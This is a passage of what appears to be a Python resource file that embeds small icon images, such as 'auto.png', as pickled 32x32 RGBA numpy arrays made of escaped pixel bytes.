da\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xda\\xda\\xda\\xff;;;\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xff\\xe3\\xe3\\xe3\\xff\\xc7\\xc7\\xc7\\xffZZZ\\xff~~~\\xff\\xd9\\xd9\\xd9\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xff\\xe3\\xe3\\xe3\\xffXXX\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb0\\xb0\\xb0\\xfffff\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xdd\\xdd\\xdd\\xffyyy\\xff\\x00\\x00\\x00\\xff\\x06\\x06\\x06\\xff\\xcd\\xcd\\xcd\\xfffff\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xda\\xda\\xda\\xff\\xaf\\xaf\\xaf\\xff\\xcd\\xcd\\xcd\\xff\\xd7\\xd7\\xd7\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x12\\x12\\x12\\xffiii\\xffccc\\xff\\x0e\\x0e\\x0e\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00'\np13\ntp14\nb.",
'auto.png': "cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I32\nI32\nI4\ntp6\ncnumpy\ndtype\np7\n(S'u1'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xad\\xad\\xad\\x19\\xa8\\xa8\\xa8\\x8d\\xa9\\xa9\\xa9\\xc1\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xaa\\xaa\\xaa\\xc2\\xa9\\xa9\\xa9\\x8e\\xad\\xad\\xad\\x19\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xa8\\xa8\\xa8X\\xa9\\xa9\\xa9\\xed\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xed\\xa8\\xa8\\xa8X\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x19\\x19\\x19\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x04\\x04\\x04\\xffHHH\\xff\\xa4\\xa4\\xa4\\xff\\xe5\\xe5\\xe5\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff \\xffyyy\\xff\\xd1\\xd1\\xd1\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x06\\x06\\x06\\xffPPP\\xff\\xab\\xab\\xab\\xff\\xe6\\xe6\\xe6\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff&&&\\xff\\x82\\x82\\x82\\xff\\xd6\\xd6\\xd6\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\t\\t\\t\\xffWWW\\xff\\xb2\\xb2\\xb2\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe5\\xe5\\xe5\\xff\\xa8\\xa8\\xa8\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff---\\xff\\x89\\x89\\x89\\xff\\xda\\xda\\xda\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xc1\\xc1\\xc1\\xfflll\\xff\\x18\\x18\\x18\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\r\\r\\r\\xff^^^\\xff\\xba\\xba\\xba\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xda\\xda\\xda\\xff...\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff555\\xff\\x90\\x90\\x90\\xff\\xde\\xde\\xde\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe2\\xe2\\xe2\\xff\\xe3\\xe3\\xe3\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff;;;\\xff\\xc1\\xc1\\xc1\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xb7\\xb7\\xb7\\xffbbb\\xff\\x12\\x12\\x12\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9